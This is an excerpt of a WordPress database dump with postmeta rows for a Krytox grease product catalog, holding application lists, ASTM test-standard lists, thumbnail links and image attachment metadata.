INSERT INTO `wp_postmeta` VALUES (6659, 649, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6660, 649, '719_default_editor', '<ul>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6661, 651, '_thumbnail_id', '754'); 
INSERT INTO `wp_postmeta` VALUES (6662, 651, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6663, 651, '719_default_editor', '<ul>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6664, 652, '_thumbnail_id', '759'); 
INSERT INTO `wp_postmeta` VALUES (6665, 652, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6666, 652, '719_default_editor', '<ul>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6667, 651, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6669, 733, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6670, 653, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6671, 653, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6672, 653, '719_default_editor', '<ul>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6673, 653, '_thumbnail_id', '758'); 
INSERT INTO `wp_postmeta` VALUES (6674, 654, '_thumbnail_id', '757'); 
INSERT INTO `wp_postmeta` VALUES (6675, 654, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6676, 654, '719_default_editor', '<ul>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6677, 760, '_wp_attached_file', '2016/08/krytox-grease-aerospace.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6678, 760, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:35:"2016/08/krytox-grease-aerospace.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:35:"krytox-grease-aerospace-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:35:"krytox-grease-aerospace-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"krytox-grease-aerospace-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:37:"krytox-grease-aerospace-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:35:"krytox-grease-aerospace-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"krytox-grease-aerospace-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"krytox-grease-aerospace-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:35:"krytox-grease-aerospace-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6679, 761, '_wp_attached_file', '2016/08/krytox-grease-aerospace-aviation.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6680, 761, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4288;s:6:"height";i:2848;s:4:"file";s:44:"2016/08/krytox-grease-aerospace-aviation.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:44:"krytox-grease-aerospace-aviation-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:44:"krytox-grease-aerospace-aviation-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:44:"krytox-grease-aerospace-aviation-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:46:"krytox-grease-aerospace-aviation-1600x1063.jpg";s:5:"width";i:1600;s:6:"height";i:1063;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:44:"krytox-grease-aerospace-aviation-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:44:"krytox-grease-aerospace-aviation-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:44:"krytox-grease-aerospace-aviation-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:44:"krytox-grease-aerospace-aviation-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6681, 655, '_thumbnail_id', '760'); 
INSERT INTO `wp_postmeta` VALUES (6682, 655, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6683, 655, '719_default_editor', '<ul>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6684, 656, '_thumbnail_id', '761'); 
INSERT INTO `wp_postmeta` VALUES (6685, 656, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6686, 656, '719_default_editor', '<ul>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6687, 734, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6688, 762, '_wp_attached_file', '2016/08/shutterstock_54472075.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6689, 762, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3620;s:6:"height";i:2715;s:4:"file";s:33:"2016/08/shutterstock_54472075.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_54472075-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_54472075-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_54472075-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_54472075-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_54472075-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_54472075-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_54472075-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_54472075-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6690, 763, '_wp_attached_file', '2016/08/shutterstock_134004515.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6691, 763, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3600;s:6:"height";i:2400;s:4:"file";s:34:"2016/08/shutterstock_134004515.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_134004515-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_134004515-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_134004515-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_134004515-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_134004515-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_134004515-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_134004515-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_134004515-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6692, 764, '_wp_attached_file', '2016/08/shutterstock_204603724.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6693, 764, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4928;s:6:"height";i:3264;s:4:"file";s:34:"2016/08/shutterstock_204603724.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_204603724-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_204603724-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_204603724-768x509.jpg";s:5:"width";i:768;s:6:"height";i:509;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_204603724-1600x1060.jpg";s:5:"width";i:1600;s:6:"height";i:1060;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_204603724-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_204603724-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_204603724-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_204603724-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6694, 765, '_wp_attached_file', '2016/08/shutterstock_376558549.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6695, 765, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4256;s:6:"height";i:2832;s:4:"file";s:34:"2016/08/shutterstock_376558549.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_376558549-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_376558549-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_376558549-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_376558549-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_376558549-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_376558549-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_376558549-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_376558549-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6696, 766, '_wp_attached_file', '2016/08/shutterstock_395244856.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6697, 766, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:34:"2016/08/shutterstock_395244856.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_395244856-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_395244856-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_395244856-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_395244856-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_395244856-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_395244856-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_395244856-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_395244856-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6698, 767, '_wp_attached_file', '2016/08/shutterstock_421483921.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6699, 767, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:8000;s:6:"height";i:4000;s:4:"file";s:34:"2016/08/shutterstock_421483921.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_421483921-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_421483921-800x400.jpg";s:5:"width";i:800;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_421483921-768x384.jpg";s:5:"width";i:768;s:6:"height";i:384;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_421483921-1600x800.jpg";s:5:"width";i:1600;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_421483921-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_421483921-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_421483921-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_421483921-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6700, 735, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6701, 768, '_wp_attached_file', '2016/08/shutterstock_428960251.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6702, 768, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:7000;s:6:"height";i:4667;s:4:"file";s:34:"2016/08/shutterstock_428960251.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_428960251-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_428960251-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_428960251-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_428960251-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_428960251-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_428960251-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_428960251-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_428960251-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6703, 452, '_thumbnail_id', '763'); 
INSERT INTO `wp_postmeta` VALUES (6704, 452, '716_default_editor', '<ul>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n 	<li>Pumps</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6705, 452, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6706, 579, '_thumbnail_id', '764'); 
INSERT INTO `wp_postmeta` VALUES (6707, 579, '716_default_editor', '<ul>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n 	<li>Pumps</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6708, 579, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6709, 580, '_thumbnail_id', '765'); 
INSERT INTO `wp_postmeta` VALUES (6710, 580, '716_default_editor', '<ul>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n 	<li>Pumps</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6711, 580, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6712, 581, '_thumbnail_id', '766'); 
INSERT INTO `wp_postmeta` VALUES (6713, 581, '716_default_editor', '<ul>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n 	<li>Pumps</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6714, 581, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6715, 582, '_thumbnail_id', '767'); 
INSERT INTO `wp_postmeta` VALUES (6716, 582, '716_default_editor', '<ul>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n 	<li>Pumps</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6717, 582, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6718, 583, '_thumbnail_id', '768'); 
INSERT INTO `wp_postmeta` VALUES (6719, 583, '716_default_editor', '<ul>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n 	<li>Pumps</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6720, 583, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6742, 347, '_thumbnail_id', '683'); 
